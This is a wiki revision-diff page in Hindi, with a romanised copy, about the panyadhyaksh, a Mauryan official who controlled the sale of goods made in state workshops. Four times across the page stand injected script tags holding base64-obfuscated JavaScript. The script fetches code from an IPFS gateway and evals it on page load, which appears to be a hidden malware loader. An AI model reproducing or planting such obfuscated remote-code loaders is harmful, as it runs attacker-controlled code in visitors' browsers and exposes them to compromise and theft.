Difference between revisions of "पण्याध्यक्ष"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''पण्याध्यक्ष''' मौर्य साम्राज्य की शासन व्यवस्था म...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
'''पण्याध्यक्ष''' मौर्य साम्राज्य की शासन व्यवस्था में एक अधिकारी का पद था।
+
'''पण्याध्यक्ष''' [[मौर्य साम्राज्य]] की शासन व्यवस्था में एक अधिकारी का पद था।
  
 
*मौर्य काल में जंगलों पर मौर्य प्रशासन का अधिकार था। इन वनों की उपज राज्य के कोष्ठागारों में पहुँचाई जाती थी और वहाँ से कारखानों में, जहाँ लकड़ी, [[मिट्टी]] तथा [[धातु]] की अनेक उपयोगी वस्तुएँ तथा युद्ध के लिए [[अस्त्र शस्त्र]] बनाए जाते थे। कारखानों में बनी वस्तुएँ '''पण्याध्यक्ष''' के नियंत्रण में बाज़ारों में बेची जाती थीं।
 
*मौर्य काल में जंगलों पर मौर्य प्रशासन का अधिकार था। इन वनों की उपज राज्य के कोष्ठागारों में पहुँचाई जाती थी और वहाँ से कारखानों में, जहाँ लकड़ी, [[मिट्टी]] तथा [[धातु]] की अनेक उपयोगी वस्तुएँ तथा युद्ध के लिए [[अस्त्र शस्त्र]] बनाए जाते थे। कारखानों में बनी वस्तुएँ '''पण्याध्यक्ष''' के नियंत्रण में बाज़ारों में बेची जाती थीं।

Revision as of 06:34, 19 April 2018

panyadhyaksh maury samrajy ki shasan vyavastha mean ek adhikari ka pad tha.

  • maury kal mean jangaloan par maury prashasan ka adhikar tha. in vanoan ki upaj rajy ke koshthagaroan mean pahuanchaee jati thi aur vahaan se karakhanoan mean, jahaan lak di, mitti tatha dhatu ki anek upayogi vastuean tatha yuddh ke lie astr shastr banae jate the. karakhanoan mean bani vastuean panyadhyaksh ke niyantran mean bazaroan mean bechi jati thian.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>